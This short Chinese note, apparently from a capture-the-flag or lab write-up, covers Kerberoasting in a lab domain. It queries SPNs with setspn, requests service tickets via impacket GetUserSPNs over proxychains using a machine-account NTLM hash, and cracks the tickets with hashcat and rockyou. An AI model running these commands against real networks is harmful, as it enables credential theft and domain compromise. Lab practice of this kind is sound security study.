可以直接

setspn -Q */* 查询

最好用impacket的它会尝试dump哈希

proxychains python GetUserSPNs.py xiaorang.lab/'XR-0923$' -hashes :feb526f76df5405afde7f1a4b7a223cd -dc-ip 172.22.14.11
proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes :feb526f76df5405afde7f1a4b7a223cd -dc-ip 172.22.14.11 -request-user tianjing

dump出哈希之后可以尝试hashcat爆破，如

hashcat -m 13100 -a 0 1.txt /usr/share/wordlists/rockyou.txt --force

具体常见可以看春秋云景的Privilege